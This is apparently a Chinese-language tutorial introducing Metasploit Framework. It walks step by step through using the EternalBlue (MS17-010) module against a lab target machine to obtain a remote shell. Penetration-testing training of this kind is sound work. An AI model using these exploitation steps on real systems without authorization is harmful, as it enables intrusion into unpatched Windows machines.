Metasploit Framework(简称MSF)是一款强大的开源渗透测试工具,具有多种功能和用途。它的主要作用包括:
渗透测试:Metasploit Framework允许安全专业人员模拟黑客攻击,以发现和利用系统和应用程序中的漏洞。这有助于组织识别并修复潜在的安全问题,提高系统的安全性。
漏洞利用:Metasploit包含大量的漏洞利用模块,可以用于入侵目标系统。这些模块使安全专业人员能够测试系统的弱点,以及评估它们是否容易受到攻击。
Payload生成:Metasploit可以生成各种Payload,包括恶意软件、木马、远程访问工具等。这些Payload可以用于渗透测试、远程控制目标系统以及进行漏洞利用。
模块化框架:Metasploit的模块化框架允许用户添加自定义模块,以扩展工具的功能。这使得Metasploit非常灵活,适用于各种不同的渗透测试需求。
渗透测试工具集:Metasploit不仅仅是一个工具,它还包括一系列辅助工具,用于信息收集、漏洞分析、社交工程等。这些工具可以帮助渗透测试专业人员更好地执行任务。
学习和教育:Metasploit是一个出色的学习工具,用于理解渗透测试技术、漏洞利用和网络安全。许多安全专业人员使用Metasploit来提高他们的技能,并教育新手渗透测试。
首先我们先用命令msfconsole打开msf
再用命令扫描目标是否存在 ms17-010 漏洞
msf5 > search ms17-010
此处扫描到5个ms17-010模块的漏洞,此处使用的模块为永恒之蓝
使用口令use 0或者use exploit/windows/smb/ms17_010_eternalblue选中这个模块
用命令show options查看模块所需配置信息
看require和great setting是否有对应关系,如有对应就是默认配置,无对应则需要自行配置,此处RHOST(靶机地址)无对应关系,ipconfig查看靶机地址(打码处即为靶机地址)
利用命令set rhosts 靶机地址配置RHOST信息
根据靶机型号设置TARGETS
配置完成后使用命令run运行模块
等待一会儿后运行成功,输入shell拿到shell权限
解决乱码问题(乱码是因为 windows 和 linux 的编码不一样导致的)
输入命令chcp 65001即可解决
